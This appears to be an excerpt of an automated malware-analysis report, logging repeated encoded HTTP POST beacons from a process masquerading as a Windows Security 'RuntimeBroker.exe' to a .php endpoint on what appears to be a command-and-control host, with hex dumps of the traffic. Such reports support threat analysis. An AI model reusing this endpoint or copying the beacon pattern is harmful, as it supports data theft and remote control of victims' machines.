                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BqueW6WynlGBfyLTP6cyfDgfRW%2B%2B1FEzMEBeImVGd8CuFWzaniyAjLYD%2BV28wZcdNvtExlKF4qukzpgYbv%2FbMhB0dnLaqbS7a8GiA5HyT4Q2BV8AKh0ABPnDT7K63XCqSJAAuv2h"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf638d691defa9-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3400&min_rtt=1971&rtt_var=3598&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=108906&cwnd=150&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          85192.168.2.449900104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:08.197552919 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:23:08.553117990 CET1056OUTData Raw: 55 56 58 54 5a 59 54 5e 55 5a 54 59 51 59 55 55 58 5e 5c 5a 59 51 52 5f 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UVXTZYT^UZTYQYUUX^\ZYQR_][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ \(-X4+1_1.])<&'2W:$]3<>U0?3^,?+>>#^!'^)/
                                                                                                                          Jan 1, 2025 04:23:08.649007082 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:08.828150988 CET810INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:08 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RK4RFXLtcEX5zBqJwCH5l%2BKjJRR75pBrk83bhPPXtpfOgh%2FKxInesmGivCPHab6zlbGXpbfzblvS4dsoQXcYVeEqI3x%2FIYVgiXyQn6GFQHT%2F%2FyWOBBOiKU6wsJTvwfLoIkJ%2Bvu6Q"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf6392c9304269-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=5350&min_rtt=2222&rtt_var=7089&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=53583&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          86192.168.2.449907104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:08.959197998 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:23:09.318656921 CET1056OUTData Raw: 55 52 5d 56 5a 5e 54 5a 55 5a 54 59 51 53 55 56 58 59 5c 5d 59 55 52 5b 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UR]VZ^TZUZTYQSUVXY\]YUR[][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ X?<-7;*$-&)$3'-.]$/!0,;(>;*#^!'^)
                                                                                                                          Jan 1, 2025 04:23:09.403636932 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:09.675461054 CET809INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:09 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v7JRHsYmVo%2BIQGVXRnBqFzYYKAw32edg%2BChU3qexdg3ZhA6IoVD0Nq%2BlBRI1BPGqoawwVDMNlN7TM9ctOTkl%2FMmWdlRkulblkB2qeZLvsLm8YobX7C8u2%2FobyQv3hUUbCp7LjrB8"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf63978f808c33-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2850&min_rtt=2003&rtt_var=2445&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=166268&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          87192.168.2.449913104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:09.805551052 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:23:10.162489891 CET1056OUTData Raw: 55 56 58 50 5a 5d 51 5c 55 5a 54 59 51 59 55 55 58 59 5c 5e 59 56 52 5b 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UVXPZ]Q\UZTYQYUUXY\^YVR[][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ#<,2#+&.]*-?'4.9;'=$/88#+ >#^!'^)/
                                                                                                                          Jan 1, 2025 04:23:10.332947016 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:10.580287933 CET804INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:10 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=20MA3%2FbNa1DSP5Y1Ep3zYBCuxqpWTRe5YzblEJWEqYhturBK19NLNGnhr62BSmHxZfK7fzkcjXdBohTLD59GdJbVnIStF3ElBkkvOrfQY09PVYCN0RAMv%2BrNGv7XBzPXVVRgsrtl"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf639d3fb68c84-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=15390&min_rtt=8611&rtt_var=16787&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=23232&cwnd=174&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          88192.168.2.449920104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:10.714535952 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1048
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:23:11.075978041 CET1048OUTData Raw: 55 54 58 50 5f 5e 54 5f 55 5a 54 59 51 5b 55 5d 58 5a 5c 59 59 50 52 5e 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UTXP_^T_UZTYQ[U]XZ\YYPR^][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ#(27!&)=?Z3$>T,$3<1$^/.<+$>#^!'^)
                                                                                                                          Jan 1, 2025 04:23:11.160233021 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:11.377130985 CET25INHTTP/1.1 100 Continue


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          89192.168.2.449924104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:11.384419918 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1780
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:23:11.740489006 CET1780OUTData Raw: 55 54 58 50 5a 5d 51 5f 55 5a 54 59 51 5c 55 57 58 52 5c 54 59 51 52 5d 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UTXPZ]Q_UZTYQ\UWXR\TYQR]][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ (/" ("2>5*0'B!: \$Y.V&/08<(=#^!'^)
                                                                                                                          Jan 1, 2025 04:23:11.841310024 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:12.111515999 CET951INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:12 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jYQOwOsqNE6nMFvPuNUAAXZLz7gJwHGMN8s%2BihDhyZokTj7UpDXgOp98m6boz1amjY3cv7ZGY0ckZlh%2FjwC7s5Z0R7tsMUCpSpp1sLyf6enOgajFwY1m6Ym49xTSlE9Fui7di8Ec"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf63a6b8698c47-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4749&min_rtt=1958&rtt_var=6317&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2124&delivery_rate=60102&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 39 38 0d 0a 03 1e 21 08 33 38 24 07 3c 00 3e 58 2d 2c 2c 0f 26 01 04 5d 33 09 2b 02 25 3e 17 14 2d 01 30 5a 3f 05 05 5b 25 14 03 5a 21 21 3e 5d 25 1c 2e 5d 04 1d 26 05 3f 39 3d 00 2a 3c 2e 02 3d 21 30 5d 27 37 3f 11 25 34 38 1e 27 04 3e 10 36 31 24 0e 27 20 38 1f 3f 29 01 12 33 2e 3e 50 34 3a 2e 57 0d 12 21 0c 25 2d 25 52 3e 1f 23 0e 21 2c 06 0a 30 2f 0e 0f 24 2c 20 57 34 01 2a 55 3e 01 3b 04 21 37 2e 0c 33 39 20 02 36 17 31 5c 23 23 22 54 20 03 2f 54 05 3d 56 4f 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 98!38$<>X-,,&]3+%>-0Z?[%Z!!>]%.]&?9=*<.=!0]'7?%48'>61$' 8?)3.>P4:.W!%-%R>#!,0/$, W4*U>;!7.39 61\##"T /T=VO0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          90192.168.2.449926104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:11.512729883 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:23:11.865504980 CET1056OUTData Raw: 55 52 5d 56 5a 5e 51 54 55 5a 54 59 51 59 55 53 58 53 5c 5b 59 56 52 5b 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UR]VZ^QTUZTYQYUSXS\[YVR[][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ +? 1[19X)(0$9-$(3!30,=$?>S*<#^!'^)/
                                                                                                                          Jan 1, 2025 04:23:11.957269907 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:12.230540037 CET804INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:12 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5rVgE69QpwNtPxMdOchLA3JC2jJ5aOMGaCyZzvbqeetymZGBxqk2y%2BP%2B30zwB2AHXrQ7q4YnxQbM83U4IIEWo%2Bu277NXLjdXCHYAZCnEhIZPHyR4hV6oB0awRHsETooZBkcwD4OA"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf63a77b2e7277-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2035&min_rtt=2015&rtt_var=796&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=670339&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          91192.168.2.449933104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:12.355498075 CET320OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Jan 1, 2025 04:23:12.709335089 CET1056OUTData Raw: 55 52 58 55 5f 5d 51 5d 55 5a 54 59 51 5d 55 54 58 5c 5c 5b 59 56 52 5b 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: URXU_]Q]UZTYQ]UTX\\[YVR[][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ ^(67.$=6(.[$4P-4]%?2T'Z/^,>$<>?><#^!'^)?
                                                                                                                          Jan 1, 2025 04:23:12.953301907 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:12.986629009 CET802INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:12 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=84cSzGqFxXdlfvZmf6oezXw1JAkKTYzCIuj21tlaIsU3ingSCGyZlh8YNfrNnq4uKr6H1fslA%2FOLr0Zh5rE8Fflu1%2FkChu6R98By8XfZQgAMHWGc3LQTZsicSc3JCvDefjGDN8Dm"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf63accd81435e-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4559&min_rtt=1735&rtt_var=6298&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1376&delivery_rate=60015&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          92192.168.2.449938104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:13.117567062 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:23:13.475066900 CET1056OUTData Raw: 50 51 5d 51 5a 59 51 5f 55 5a 54 59 51 5c 55 54 58 5d 5c 55 59 50 52 5a 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: PQ]QZYQ_UZTYQ\UTX]\UYPRZ][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ#+?>489Y1>)])('994(]3-$/3X8-+<.'=#^!'^)
                                                                                                                          Jan 1, 2025 04:23:13.580058098 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:13.753535986 CET807INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:13 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vFwOjV8ZSwzSA8XXuoMF%2Fr%2BV6Z1GMR80Q8S1QsqIXU2iSzDfULGRcrsWGiD5rSTWZeEHabNpa6TI69BlCSWjSPVoaB%2Bb79GHQuzUgGSCLn9Ai46ng%2B6hJGCdMayFq0oR7VtqjZyh"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf63b19f8d80cd-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=9635&min_rtt=1542&rtt_var=16765&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=22023&cwnd=177&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          93192.168.2.449946104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:14.223828077 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:23:14.568655014 CET1056OUTData Raw: 55 54 58 55 5f 5b 54 5f 55 5a 54 59 51 58 55 53 58 59 5c 59 59 53 52 5b 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UTXU_[T_UZTYQXUSXY\YYSR[][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ +/%[7"1:).$34:-(%<-0 ;8?8U>#^!'^)+
                                                                                                                          Jan 1, 2025 04:23:14.714242935 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:14.968651056 CET808INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:14 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r7CZ0%2Bfn2e9DCdikl%2BpoTExcAbngRgCkBtPFdqeIOpEOGX%2BMLUy4rwiMjCYDr5m3FWtZ2ueEhLoGo2jPQQyp4%2F70FxCO45S0aBkubGwsATpT%2BB6bZu%2B6ZKjIxuOCMv9%2BfzbYF7tr"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf63b89f09438e-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=8613&min_rtt=2063&rtt_var=13875&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=26804&cwnd=205&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a
                                                                                                                          Data Ascii: 41V[X
